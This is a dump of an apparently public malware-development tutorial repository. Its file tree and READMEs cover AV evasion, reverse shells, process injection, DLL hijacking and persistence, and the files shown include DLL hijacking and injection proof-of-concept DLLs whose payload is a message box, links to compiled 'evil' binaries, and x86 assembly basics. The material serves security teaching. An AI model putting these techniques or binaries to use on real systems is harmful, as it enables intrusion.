2021-04-09-av-evasion-1-/: README.md, calc.bin, evil-enc.cpp, evil.cpp, evil.exe, evil_enc.py, evil_xor.cpp
2021-09-06-av-evasion-2/: README.md, enc.py, evil-enc.cpp, evil.cpp, evil.exe
2021-09-11-reverse-shells/: README.md, shell, shell.c
2021-09-15-rev-c-1/: README.md, enc-aes.py, shell-aes.cpp, shell.cpp, shell.exe
2021-09-19-injection-1/: README.md, evil.cpp, evil.exe, evil2.exe, evil_inj.cpp
2021-09-24-dllhijack/: README.md, bginfo-4.16.zip, evil.c, evil.dll
2021-09-24-injection-2/: README.md, evil.cpp, evil.dll, evil_inj.cpp, inj.exe
2021-09-29-processfind-1/: README.md, evil.cpp, evil.dll, hack.cpp, hack.exe, hack2.cpp, hack2.exe
2021-10-03-malware-analysis-1/: README.md, peda-session-test1.txt, test1, test1.asm, test1.o
2021-10-08-malware-analysis-2/: .gdb_history, README.md, example1, example1.asm, example1.c, example1.exe, example1.o, example2, example2.asm, example2.o, example3, example3.asm, example3.c, example3.o, hello, hello.asm, hello.c, hello.o, hello2, hello2.asm, hello2.exe, hello2.o, hello3, hello3.asm, hello3.exe, hello3.o, hello64, hello64.asm, hello64.o, peda-session-example1.txt, peda-session-example2.txt, peda-session-example3.txt, peda-session-hello.txt, peda-session-hello2.txt, peda-session-hello3.txt, peda-session-hello64.txt
2021-10-09-linux-shellcoding-1/: .gdb_history, README.md, example1, example1.asm, example1.o, example2, example2.asm, example2.o, example3, example3.asm, example3.o, exit0, exit0.c, exit1, exit1.asm, exit1.o, exit2, exit2.asm, exit2.o, meow, meow.c, peda-session-dash.txt, peda-session-example1.txt, peda-session-example2.txt, peda-session-run.txt, run, run.c, shell2, shell2.c
2021-10-12-dll-hijacking-2/: README.md, cartoon.cpp, cartoon.exe, cscapi.def, cscapi.dll, dll-def.py, evil.c, evil.dll, evil2.c, evil2.dll, pet.c, pet.def, pet.dll
2021-10-17-linux-shellcoding-2/: .gdb_history, README.md, peda-session-rev.txt, rev, rev.asm, rev.o, run, run.c, shell.c, super_shellcode.py
2021-10-20-buffer-overflow-1/: .gdb_history, .gitignore, README.md, exploit.py, vuln, vuln.c
2021-10-26-windows-shellcoding-1/: README.md, conv.py, example1, example1.asm, example1.o, exit.c, exit.exe, getaddr.c, getaddr.exe, run.c, run.exe
2021-10-30-windows-shellcoding-2/: README.md, kernel.asm, kernel.exe, kernel.o
2021-11-11-malware-injection-3/: README.md, evil.cpp, evil.exe
2021-11-20-injection-4/: README.md, hack.cpp, hack.exe
2021-11-22-malware-injection-5/: README.md, hack.cpp, hack.exe
2021-11-23-malware-injection-6/: README.md, hack.cpp, hack.exe
2021-11-24-malware-injection-7/: README.md, evil.cpp, evil.dll, hack.cpp, hack.exe
2021-11-26-malware-injection-8/: README.md, hack.cpp, hack.exe
2021-11-30-basic-hooking-1/: README.md, cat.cpp, cat.exe, example, example.asm, example.o, hooking.cpp, hooking.exe, hooking2.cpp, hooking2.exe, pet.cpp, pet.dll
2021-12-03-inline-asm-1/: hack.cpp, hack.exe
2021-12-06-malware-injection-9/: README.md, evil.c, evil.dll, hack.cpp, hack.exe, mouse.c, mouse.exe
2021-12-07-malware-injection-10/: README.md, hack.cpp, hack.exe
2021-12-11-malware-injection-11/: README.md, hack.cpp, hack.exe
2021-12-13-malware-injection-12/: README.md, hack.cpp, hack.exe
2021-12-21-simple-malware-av-evasion-3/: README.md, hack.cpp, hack.exe, hack2.cpp, hack2.exe
2022-01-14-malware-injection-13/: README.md, hack.cpp, hack.exe
2022-01-17-malware-injection-14/: README.md, hack.cpp, hack.exe
2022-01-24-malware-injection-15/: README.md, hack.cpp, hack.exe, ntddk.h
2022-02-01-malware-injection-16/: README.md, hack.cpp, hack.exe
2022-02-07-mem-forensics-1/: .gitignore, README.md, hack.cpp, hack.exe
2022-02-15-malware-analysis-3/: README.md, hack.cpp, hack.exe, meow.yar
2022-02-23-malware-analysis-4/: README.md, hack.cpp, hack.exe, requirements.txt, vtscan.py
2022-03-08-basic-hooking-2/: README.md, hooking.cpp, hooking.exe, pet.cpp, pet.dll
2022-03-14-malware-injection-17/: hack.cpp, hack.exe, hack2.cpp, hack2.exe
2022-03-18-malware-av-evasion-4/: README.md, dll-def.py, encrypt.py, hack.cpp, hack.exe, user32.def, user32.dll
2022-03-22-malware-av-evasion-5/: README.md, hack.cpp, hack.exe, meow.cpp, meow.exe, myhash.py
2022-03-27-malware-analysis-5/: classic.cpp, classic.exe, evil.cpp, evil.dll, hack.cpp, hack.exe, myhash.py
2022-04-02-malware-injection-18/: README.md, hack.cpp, hack.exe, meow.cpp, meow.exe, myhash.py
2022-04-09-malware-av-evasion-6/: README.md, hack.cpp, hack.exe
2022-04-13-malware-injection-19/: README.md, evil.cpp, evil.dll, hack.cpp, hack.exe
2022-04-20-malware-pers-1/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe
2022-04-26-malware-pers-2/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe
2022-05-02-malware-pers-3/: README.md, evil.cpp, evil.dll, evil.reg, orig.reg, pers.cpp, pers.exe
2022-05-09-malware-pers-4/: README.md, meow.exe, meowsrv.cpp, meowsrv.exe
2022-05-16-malware-pers-5/: README.md, evil.cpp, evil.dll, evil2.cpp, pers.cpp, pers.exe
2022-05-29-malware-pers-6/: README.md, evil.cpp, evil.dll, evil2.cpp, evil2.dll, pers.cpp, pers.exe
2022-06-05-malware-av-evasion-7/: README.md, hack.cpp, hack.exe
2022-06-12-malware-pers-7/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe
2022-06-19-malware-pers-8/: README.md, detect.ps1, evil.cpp, evil.dll, evil2.dll, monitor.cpp, monitor.exe, pers.cpp, pers.exe
2022-06-27-malware-injection-20/: README.md, hack.cpp, hack.exe
2022-07-13-malware-injection-21/: README.md, hack.cpp, hack.exe
2022-07-21-malware-tricks-22/: README.md, hack.cpp, hack.exe, meow.bin, payload_uuid.py
2022-07-29-malware-av-evasion-8/: README.md, encode.cpp, encode.exe, hack.cpp, hack.exe, z85.c, z85.h
2022-08-16-malware-av-evasion-9/: README.md, hack.cpp, hack.exe, meow.bin
2022-08-26-malware-pers-9/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe, test.txt
2022-09-06-malware-tricks-23/: README.md, hack.cpp, hack.exe
2022-09-10-malware-pers-10/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe, pers2.cpp, pers2.exe
2022-09-15-malware-av-evasion-10/: README.md, hack.cpp, hack.exe
2022-09-20-malware-pers-11/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe
2022-09-25-token-theft-1/: README.md, hack.cpp, hack.exe
2022-09-30-malware-pers-12/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe
2022-10-04-malware-pers-13/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe
2022-10-09-malware-pers-14/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe
2022-10-12-malware-pers-15/: README.md, dll-def.py, evil.c, evil.dll, suspend.dll
2022-10-21-malware-pers-16/: README.md, hack.c, hack.dll, pers.cpp, pers.exe
2022-10-28-malware-pers-17/: hack.cpp, pers.cpp
2022-10-28-token-theft-2/: README.md, hack.cpp, hack.exe
2022-11-02-malware-pers-18/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe
2022-11-05-malware-analysis-6/: aes.bin, aes.py, entropy.py, hack.cpp, hack.exe, hack2.cpp, hack2.exe, meow.bin, xor.bin, xor.py
2022-11-16-malware-pers-19/: README.md, hack.cpp, hack.dll, pers.cpp, pers.exe
2022-11-27-malware-tricks-24/: README.md, hack.cpp, hack.exe
2022-12-21-malware-tricks-25/: README.md, evil.c, evil.dll, hack.cpp, hack.exe, hack2.cpp, hack2.exe, hack3.cpp, hack3.exe
2023-01-04-malware-tricks-26/: README.md, hack.cpp, hack.exe
2023-01-20-malware-pers-21/: README.md, hack.cpp, hack.exe, pers.cpp, pers.exe
2023-01-27-malware-analysis-7/: README.md, crc32.py, crc32.yar, hack.cpp, hack.exe, hack2.cpp, hack2.exe
2023-02-10-malware-analysis-8/: README.md, hack.cpp, hack.exe, murmur.py, murmur.yar
2023-02-13-malware-av-evasion-11/: README.md, des.py, entropy.py, hack.cpp, hack.exe, hack2.cpp, hack2.exe, hack3.cpp, hack3.exe
2023-02-20-malware-av-evasion-12/: entropy.py, hack.c, hack.exe, hack2.c, hack2.exe, hack3.c, hack3.exe, hack4.c, hack4.exe, tea.py
2023-03-09-malware-av-evasion-13/: README.md, entropy.py, madryga.c, madryga.exe, meow.bin, meow.py
2023-03-24-malware-av-evasion-14/: README.md, entropy.py, hack.c, hack.exe, hack2.c, hack2.exe, hack3.c, hack3.exe
2023-04-08-malware-av-evasion-15/: README.md, hack.cpp, hack.exe
2023-04-16-malware-av-evasion-16/: README.md, hack.cpp, hack.exe
2023-04-27-malware-tricks-27/: README.md, hack.cpp, hack.exe, pet.c, pet.dll
2023-05-11-malware-tricks-28/: README.md, hack.cpp, hack.exe
2023-05-22-malware-tricks-29/: README.md, hack.cpp, hack.exe, hack2.cpp, hack2.exe
2023-05-26-malware-tricks-30/: README.md, evil.c, evil.dll, hack.cpp, hack.exe, hack2.cpp, hack2.exe
2023-06-04-malware-tricks-31/: README.md, hack.c, hack.exe
2023-06-07-syscalls-1/: README.md, evil.c, evil.dll, hack.c, hack.exe, hack2.c, hack2.exe
2023-06-09-syscalls-2/: README.md, hack.c, hack.exe, hack.o, syscall.asm, syscall.o
2023-06-19-malware-av-evasion-17/: README.md, hack.c, hack.exe
2023-06-26-malware-av-evasion-18/: README.md, hack.c, hack.exe, hack2.c, hack2.exe
2023-07-07-malware-trick-34/: README.md, evil.c, evil.dll, hack.c, hack.exe, hack2.c, hack2.exe
2023-07-16-malware-pers-22/: ErrorHandler.cmd, README.md, hack.c, hack.exe, pers.c, pers.exe
2023-07-26-malware-trick-35/: README.md, hack.c, hack.exe, meow.txt
2023-08-13-malware-cryptography-1/: README.md, hack.c, hack.exe
2023-08-28-malware-cryptography-20/: README.md, hack.c, hack.exe
2023-09-25-malware-trick-36/: README.md, hack.c, hack.exe
2023-10-20-malware-cryptography-21/: README.md, hack.c, hack.exe
2023-11-07-malware-trick-37/: README.md, hack.c, hack.exe
2023-11-23-malware-cryptography-22/: README.md, encrypt.py, entropy.py, hack.c, hack.exe
2023-12-10-malware-pers-23/: README.md, hack.c, hack.exe, pers.ps1
2023-12-14-malware-av-evasion-19/: hack.c
2023-12-25-malware-cryptography-23/: README.md, hack.c, hack.exe
2024-01-16-malware-cryptography-24/: README.md, hack.c, hack.exe, hack2.c, hack2.exe, test-decrypted.txt, test-encrypted.bin, test.txt
2024-02-21-malware-cryptography-25/: README.md, hack.c, hack.exe
2024-02-29-malware-av-evasion-19/: hack.c
2024-03-12-malware-pers-24/: README.md, hack.c, hack.dll, pers.c, pers.exe
2024-04-09-malware-cryptography-26/: README.md, hack.c, hack.exe
2024-04-19-malware-trick-38/: hack.c, hack.exe, hack.rc, icon.o, notepad.ico, notepad.png
2024-05-01-malware-trick-38/: README.md, hack.c, hack.exe, hack2.c, hack2.exe, hack3.c, hack3.exe
2024-05-12-malware-cryptography-27/: hack.c, hack.exe, test.txt
2024-06-01-malware-cryptography-28/: README.md, hack.exe, hack.nim, hack1.c, hack1.exe, hack2.exe, hack2.nim
2024-06-12-malware-trick-39/: hack.exe, hack.nim
2024-06-16-malware-trick-40/: README.md, hack.c, hack.exe, mybot.py
2024-06-20-linux-kernel-hacking-1/: Makefile, README.md, hack.c
2024-06-25-malware-trick-41/: README.md, hack.c, hack.exe, meow.c, meow.exe
2024-06-28-malware-trick-42/: README.md, hack.c, hack.exe
2024-07-08-malware-pers-25/: README.md, hack.c, hack.exe, pers.c, pers.exe
2024-07-16-malware-cryptography-29/: README.md, hack.c, hack.exe
2024-07-21-malware-cryptography-30/: README.md, hack.c, hack.exe
2024-07-29-malware-cryptography-31/: README.md, hack.c, hack.exe, hack2.c, hack2.exe, hack3.c, hack3.exe, myhash.py
2024-08-14-malware-pers-26/: README.md, hack.c, hack.dll, pers.c, pers.exe
2024-09-12-malware-cryptography-32/: README.md, hack.c, hack.exe
2024-09-16-linux-hacking-2/: README.md, hack, hack.c, hack2, hack2.c, hack3, hack3.c
2024-09-30-malware-trick-43/: README.md, bin2data.py, deshuffled.bin, entropy.py, hack.c, hack.exe, hack2.c, hack2.exe, hack3.c, hack3.exe, meow.bin, shuffled.bin
2024-10-20-malware-cryptography-33/: README.md, hack, hack.c, hack2.c, hack2.exe
2024-11-10-malware-cryptography-34/: README.md, hack.c, hack.exe
2024-11-22-linux-hacking-3/: README.md, hack, hack.c, meow, meow.c
2024-11-30-malware-cryptography-35/: README.md, hack.c, hack.exe
2024-12-16-malware-cryptography-36/: README.md, hack, hack.c, hack2.c, hack2.exe, hack3, hack3.c, hack4.c, hack4.exe
2024-12-23-malware-cryptography-37/: README.md, hack, hack.c, sbox_nonlinearity.py
2024-12-29-malware-cryptography-38/: entropy.py, hack.c, hack.exe, sbox-analyses.py, sbox-nonlinearity.py
2025-01-16-malware-cryptography-39/: hack.c, hack.exe
2025-01-19-malware-tricks-44/: README.md, hack.c, hack.exe
2025-02-01-linux-hacking-4/: hack, hack.c
2025-02-24-malware-trick-45/: cat.png, hack, hack.c, hack.exe, stego.png, vtscan.py
2025-03-12-malware-pers-27/: hack.c, hack.exe, pers.c, pers.exe
2025-04-02-malware-cryptography-40/: README.md, hack.exe, hack.nim
2025-04-10-malware-cryptography-41/: hack.exe, hack.nim
2025-05-01-malware-tricks-46/: hack.c, hack.exe
2025-05-10-malware-tricks-47/: hack.c, hack.exe, hack2.c, hack2.exe, hack3.c, hack3.exe
2025-05-29-malware-cryptography-42/: hack, hack.c, hack2.c, hack2.exe, hack3, hack3.c, vtscan.py
README.md (repository root)
hvck/2022-12-01-malware-analysis-online/: 2022-02-23_14-48.png, README.md, locker.exe, ms.py, shell.exe, vt.py
hvck/2023-01-01-rf-wifi/: README.md, hack.py, photo_2023-01-04_15-55-20.jpg
hvck/2023-01-12-zte-crack/: 2023-01-15_05-56.png, README.md, wordlist.txt, zte_hack.py
hvck/2023-03-04-binary-edge/: 2023-03-05_17-08.png, README.md, search.py
hvck/2023-03-05-encshell/: 2023-03-08_20-56.png, enc.c, enc.exe, entropy.py, hack.c, hack.exe, hack0.c, hack0.exe, meow.bin
hvck/2024-05-01-nim-injection/: README.md, hack.exe, hack.nim, hack2.exe, hack2.nim, hello.exe, hello.nim, img/, xorE.exe, xorE.nim
hvck/2024-05-01-nim-injection/img/: 2024-06-01_12-02.png, 2024-06-01_12-08.png, 2024-06-01_12-10.png, 2024-06-01_12-10_1.png, 2024-06-01_12-11.png, 2024-06-01_12-12.png, 2024-06-01_12-15.png, 2024-06-01_12-42.png, 2024-06-01_12-45.png, 2024-06-01_12-53.png, 2024-06-01_12-55.png, 2024-06-01_12-56.png
meow.png (repository root)

/2021-04-09-av-evasion-1-/README.md:
--------------------------------------------------------------------------------
# AV engines evasion for C++ simple malware - part 1

Source code of the post:

[https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html](https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html)
--------------------------------------------------------------------------------

/2021-04-09-av-evasion-1-/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-04-09-av-evasion-1-/calc.bin
--------------------------------------------------------------------------------

/2021-04-09-av-evasion-1-/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-04-09-av-evasion-1-/evil.exe
--------------------------------------------------------------------------------

/2021-09-06-av-evasion-2/README.md:
--------------------------------------------------------------------------------
# AV engines evasion for C++ simple malware - part 2

Source code of the post:

[https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html](https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html)
--------------------------------------------------------------------------------

/2021-09-06-av-evasion-2/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-06-av-evasion-2/evil.exe
--------------------------------------------------------------------------------

/2021-09-11-reverse-shells/README.md:
--------------------------------------------------------------------------------
# Reverse shells. Simple reverse shell in C

Source code of the post:

[https://cocomelonc.github.io/tutorial/2021/09/11/reverse-shells.html](https://cocomelonc.github.io/tutorial/2021/09/11/reverse-shells.html)
--------------------------------------------------------------------------------

/2021-09-11-reverse-shells/shell:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-11-reverse-shells/shell
--------------------------------------------------------------------------------

/2021-09-15-rev-c-1/README.md:
--------------------------------------------------------------------------------
# Simple C++ reverse shell for Windows

Source code of the post:

[https://cocomelonc.github.io/tutorial/2021/09/15/simple-rev-c-1.html](https://cocomelonc.github.io/tutorial/2021/09/15/simple-rev-c-1.html)
--------------------------------------------------------------------------------

/2021-09-15-rev-c-1/shell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-15-rev-c-1/shell.exe
--------------------------------------------------------------------------------

/2021-09-19-injection-1/README.md:
--------------------------------------------------------------------------------
# C++ code injection to another process

Simple classic code injection into another process.

[https://cocomelonc.github.io/tutorial/2021/09/18/malware-injection-1.html](https://cocomelonc.github.io/tutorial/2021/09/18/malware-injection-1.html)
--------------------------------------------------------------------------------

/2021-09-19-injection-1/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-19-injection-1/evil.exe
--------------------------------------------------------------------------------

/2021-09-19-injection-1/evil2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-19-injection-1/evil2.exe
--------------------------------------------------------------------------------

/2021-09-24-dllhijack/README.md:
--------------------------------------------------------------------------------
# DLL hijacking in Windows.

Classic DLL hijacking in Windows. Simple C proof of concept.

[https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
--------------------------------------------------------------------------------

/2021-09-24-dllhijack/bginfo-4.16.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-24-dllhijack/bginfo-4.16.zip
--------------------------------------------------------------------------------

/2021-09-24-dllhijack/evil.c:
--------------------------------------------------------------------------------
/*
DLL hijacking example
author: @cocomelonc
https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
      // runs when the DLL is mapped into the process: a message box serves as proof that the planted DLL was loaded
      MessageBox(
        NULL,
        "Meow-meow!",
        "=^..^=",
        MB_OK
      );
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}
--------------------------------------------------------------------------------

/2021-09-24-dllhijack/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-24-dllhijack/evil.dll
--------------------------------------------------------------------------------

/2021-09-24-injection-2/README.md:
--------------------------------------------------------------------------------
# C++ DLL injection to another process

Simple classic DLL injection into another process.

[https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html](https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html)
--------------------------------------------------------------------------------

/2021-09-24-injection-2/evil.cpp:
--------------------------------------------------------------------------------
/*
evil.cpp
simple DLL for injecting into a process
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
  switch (nReason) {
    case DLL_PROCESS_ATTACH:
      // runs once when the DLL is loaded into the target process
      MessageBox(
        NULL,
        "Meow from evil.dll!",
        "=^..^=",
        MB_OK
      );
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}
--------------------------------------------------------------------------------

/2021-09-24-injection-2/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-24-injection-2/evil.dll
--------------------------------------------------------------------------------

/2021-09-24-injection-2/inj.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-24-injection-2/inj.exe
--------------------------------------------------------------------------------

/2021-09-29-processfind-1/README.md:
--------------------------------------------------------------------------------
# Find a process by name and inject a DLL into it.

Find a process PID by name and inject into it. Simple C++ proof of concept.

[https://cocomelonc.github.io/pentest/2021/09/29/findmyprocess.html](https://cocomelonc.github.io/pentest/2021/09/29/findmyprocess.html)
--------------------------------------------------------------------------------

/2021-09-29-processfind-1/evil.cpp:
--------------------------------------------------------------------------------
/*
evil.cpp
simple DLL for injecting into a process
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
  switch (nReason) {
    case DLL_PROCESS_ATTACH:
      // runs once when the DLL is loaded into the target process
      MessageBox(
        NULL,
        "Meow from evil.dll!",
        "=^..^=",
        MB_OK
      );
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}
--------------------------------------------------------------------------------

/2021-09-29-processfind-1/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-29-processfind-1/evil.dll
--------------------------------------------------------------------------------

/2021-09-29-processfind-1/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-29-processfind-1/hack.exe
--------------------------------------------------------------------------------

/2021-09-29-processfind-1/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-09-29-processfind-1/hack2.exe
--------------------------------------------------------------------------------
/2021-10-03-malware-analysis-1/README.md:
--------------------------------------------------------------------------------
# Intro to x86 assembly language

A simple x86 assembly example. First post in the series.

[https://cocomelonc.github.io/tutorial/2021/10/03/malware-analysis-1.html](https://cocomelonc.github.io/tutorial/2021/10/03/malware-analysis-1.html)
--------------------------------------------------------------------------------

/2021-10-03-malware-analysis-1/peda-session-test1.txt:
--------------------------------------------------------------------------------
break _start
--------------------------------------------------------------------------------

/2021-10-03-malware-analysis-1/test1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-03-malware-analysis-1/test1
--------------------------------------------------------------------------------

/2021-10-03-malware-analysis-1/test1.asm:
--------------------------------------------------------------------------------
; first program in asm
; author @cocomelonc

section .data

section .bss

section .text
global _start          ; must be declared for the linker

_start:                ; linker entry point
  mov eax, 100         ; move 100 into the EAX register

; normal exit
exit:
  mov eax, 1           ; sys_exit system call number
  mov ebx, 0           ; exit code 0: successful execution
  int 0x80             ; invoke the kernel (sys_exit)
--------------------------------------------------------------------------------

/2021-10-03-malware-analysis-1/test1.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-03-malware-analysis-1/test1.o
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/README.md:
--------------------------------------------------------------------------------
# NASM tutorial. Malware analysis part 2.

NASM tutorial. Malware analysis part 2. Linux 32-bit and Windows PE file examples.

[https://cocomelonc.github.io/tutorial/2021/10/08/malware-analysis-2.html](https://cocomelonc.github.io/tutorial/2021/10/08/malware-analysis-2.html)
--------------------------------------------------------------------------------

/2021-10-08-malware-analysis-2/example1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example1
--------------------------------------------------------------------------------

/2021-10-08-malware-analysis-2/example1.asm:
--------------------------------------------------------------------------------
; example1.asm
; author: @cocomelonc
; run:
;   nasm -f elf32 -o example1.o example1.asm
;   gcc -static -m32 -o example1 example1.o
; 32-bit linux

section .text
global main

main:
  push ebp             ; function prologue: save caller's frame pointer
  mov ebp, esp         ; set up our own stack frame
  mov eax, 123         ; return value goes in EAX
  mov esp, ebp         ; function epilogue: tear down the frame
  pop ebp
  ret

section .data
--------------------------------------------------------------------------------

/2021-10-08-malware-analysis-2/example1.c:
--------------------------------------------------------------------------------
#include <stdio.h>

int main(void) {
  return 123;
}
--------------------------------------------------------------------------------

/2021-10-08-malware-analysis-2/example1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example1.exe
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/example1.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example1.o
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/example2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example2
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/example2.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example2.o
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/example3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example3
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/example3.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>

int addMe(int a, int b) {
  return 42 * a + b;
}

int main(void) {
  int c;
  c = addMe(3, 5);   // 131; the result is never used, so an optimising build may drop the call
  return 0;
}
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/example3.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/example3.o
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello.c:
--------------------------------------------------------------------------------
#include <stdio.h>

int main(void) {
  puts ("hello world");
}

--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello.o
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello2
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello2.asm:
--------------------------------------------------------------------------------
; hello2.asm: writes "hello world" to the console by using C lib.
; author: @cocomelonc
; run:
; nasm -f elf32 -o hello2.o hello2.asm
; gcc -static -m32 -o hello2 hello2.o && ./hello2
; 32-bit linux

section .text
global main
extern puts

main:                        ; called by C lib startup code
  push msg                   ; address of string to output (cdecl: arguments go on the stack)
  call puts                  ; puts (msg)
  add esp, 4                 ; cdecl: the caller removes the argument (1 argument, 4 bytes)
  xor eax, eax               ; a faster way of setting eax (main's return value) to zero
  ret                        ; return from main back into C library wrapper

msg: db "hello world", 0     ; note strings must be terminated with 0 in C
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello2.exe
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello2.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello2.o
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello3
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello3.exe:
--------------------------------------------------------------------------------
